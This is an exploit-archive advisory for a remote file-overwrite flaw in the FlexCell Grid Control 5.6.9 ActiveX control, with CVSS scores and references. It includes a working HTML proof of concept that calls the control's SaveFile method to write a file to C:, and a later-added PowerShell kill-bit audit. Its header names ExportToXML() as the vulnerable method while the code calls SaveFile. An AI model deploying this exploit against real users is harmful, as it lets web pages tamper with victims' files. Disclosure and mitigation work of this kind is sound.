FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit

2009.01.31
Credit: Houssamix
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<HTML>
<BODY>
<b>
Author : Houssamix <br/>
<br/>
<br/>
FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit <br/>
ExportToXML() is vuln to <br/>
</b>
<object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object>
<SCRIPT>
/*
Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
*/
function hehe()
{
File = "c:\\hsmx.txt"
hsmx.SaveFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>
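
A defensive check for the control shown in the PoC above, added here as an example (not part of the original advisory): it reports whether the Internet Explorer kill bit is set for the CLSID given on this page and can set it. The function name Test-ActiveXKillBit and its -Apply switch are illustrative; the registry location and the 0x400 flag are the standard ActiveX Compatibility kill-bit mechanism.

```powershell
# Added example: audit (and optionally set) the IE kill bit for the control's CLSID.
# The CLSID comes from the PoC on this page; the function name and -Apply are illustrative.
$Clsid   = '{2A7D9CCE-211A-4654-9449-718F71ED9644}'
$KillBit = 0x400   # COMPAT_EVIL_DONT_LOAD bit in the "Compatibility Flags" value

# Native and 32-bit-on-64-bit registry views; IE reads the one matching its bitness.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Test-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid, [switch]$Apply)

    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent on this OS
        $key   = Join-Path $root $Clsid
        $flags = 0
        if (Test-Path -LiteralPath $key) {
            $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
            if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
        }

        if (($flags -band $KillBit) -eq 0 -and $Apply) {
            # Needs an elevated session. Existing flag bits are preserved.
            if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
            $flags = $flags -bor $KillBit
            New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
                -PropertyType DWord -Value $flags -Force | Out-Null
        }

        [pscustomobject]@{
            Key        = $key
            Flags      = '0x{0:X8}' -f $flags
            KillBitSet = ($flags -band $KillBit) -ne 0
        }
    }
}

# Report only; add -Apply from an elevated prompt to set the kill bit.
Test-ActiveXKillBit -Clsid $Clsid
```

The kill bit stops Internet Explorer from instantiating the control from a web page; it does not remove or patch the control for other hosts that load it.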

References:

http://www.securityfocus.com/bid/33453
http://www.milw0rm.com/exploits/7868
http://secunia.com/advisories/33664

